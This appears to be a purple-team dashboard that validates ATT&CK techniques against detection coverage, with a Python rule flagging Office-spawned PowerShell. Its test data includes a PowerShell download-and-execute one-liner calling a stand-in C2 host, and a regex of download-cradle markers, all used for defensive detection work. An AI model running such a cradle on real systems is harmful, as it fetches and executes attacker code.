Attack Validation

Validate Red Team attacks against Blue Team detection capabilities

Validation Success Rates

  • Total Validations: 87
  • Validated: 64 (74%)
  • Failed: 15 (17%)
  • Pending: 8 (9%)

Success rate by tactic:
  • Initial Access: 85%
  • Execution: 72%
  • Persistence: 68%
  • Privilege Escalation: 79%
  • Lateral Movement: 61%
Validation Scenarios

  Technique   Name                       Status     Tactic                 Last result
  T1566.001   Spearphishing Attachment   VALIDATED  Initial Access         Validated 2h ago
  T1059.001   PowerShell Execution       VALIDATED  Execution              Validated 5h ago
  T1547.001   Registry Run Keys          FAILED     Persistence            Failed 1d ago
  T1548.002   Bypass UAC                 VALIDATED  Privilege Escalation   Validated 2d ago
  T1003.001   LSASS Memory Dump          PENDING    Credential Access      Running...
  T1021.001   Remote Desktop Protocol    VALIDATED  Lateral Movement       Validated 3d ago
  T1055.001   Process Injection - DLL    FAILED     Defense Evasion        Failed 4d ago
  T1087.001   Local Account Discovery    VALIDATED  Discovery              Validated 5d ago
Validation Details

T1566.001 - Spearphishing Attachment (Initial Access)

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

Tags: Email, Malware, Social Engineering

Attack Steps (Red Team)
  1. Crafted malicious document: created Excel file with embedded macro (invoice.xlsm)
  2. Sent phishing email: sent to target@semestra.local with spoofed sender address
  3. Victim opened attachment: user opened document and enabled macros
  4. Payload executed: macro executed PowerShell to download second-stage payload

Detection Points (Blue Team)
  • Email Gateway Detection: should detect suspicious attachment and sender anomaly
  • Endpoint AV/EDR: should detect malicious macro and block execution
  • PowerShell Logging: should log suspicious PowerShell activity
  • Network Monitoring: should detect outbound connection to C2 server
Validation Results
Yes - Attack Detected

EDR detected malicious macro execution and blocked payload download. Email gateway flagged as suspicious but allowed delivery.

  • Time from execution to alert: 2.4s
  • False positive rate: 0.8% (very low)
  • Detection coverage: 75% (3 of 4 detection points)

Per detection point:
  • Email Gateway: Partial detection (flagged but allowed)
  • Endpoint EDR: Detected and blocked macro execution
  • PowerShell Logging: Captured malicious activity
  • Network Monitoring: No alert (payload blocked before connection)
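The PowerShell Logging detection point above boils down to a process-lineage rule: an Office application spawning PowerShell, escalated when the command line carries a download cradle or evasion switches (attack step 4). The block below is an added example, not code from this dashboard or its tooling; it assumes Sysmon-style ParentImage/Image/CommandLine field names and runs over constructed events.

```python
import re
from collections import namedtuple
from typing import Optional
Alert = namedtuple("Alert", "technique severity reason")

# Parent/child pairs for the "macro executed PowerShell" step (lower-cased basenames)
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-cradle and evasion markers typical of a second-stage fetch launched by a macro
DOWNLOAD_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|-enc(odedcommand)?\b|-e(xecutionpolicy|p)\s+bypass)",
    re.IGNORECASE,
)
def basename(path: str) -> str:
    # Lower-cased file name from a Windows or POSIX path
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: dict) -> Optional[Alert]:
    """Score one process-creation event; None means no detection fired."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if image not in POWERSHELL:
        return None
    cradle = DOWNLOAD_MARKERS.search(event.get("CommandLine", "")) is not None
    if parent in OFFICE_PARENTS:
        if cradle:
            return Alert("T1566.001", "high", f"{parent} spawned {image} with download/evasion markers")
        return Alert("T1566.001", "medium", f"{parent} spawned {image}")  # macro ran PowerShell, no cradle seen
    if cradle:
        return Alert("T1059.001", "low", f"download cradle in {image} under non-Office parent {parent}")
    return None

# Constructed sample events (Sysmon-style field names assumed; not telemetry from the run above)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://c2.example.invalid/stage2')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def run(events=SAMPLE_EVENTS) -> list:
    # Alerts raised over a batch of events, in input order
    return [a for a in map(evaluate, events) if a is not None]
```

Only the first constructed event fires (high); an interactive PowerShell session under explorer.exe stays silent, which is the false-positive behaviour the 0.8% figure above depends on.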
Notes & Comments

Purple Team Lead (2 hours ago):
Email gateway needs tuning to block rather than just flag. Consider implementing stricter macro policies.

Blue Team Analyst (1 hour ago):
Agreed. Will update email security rules to quarantine Office files with macros from external senders.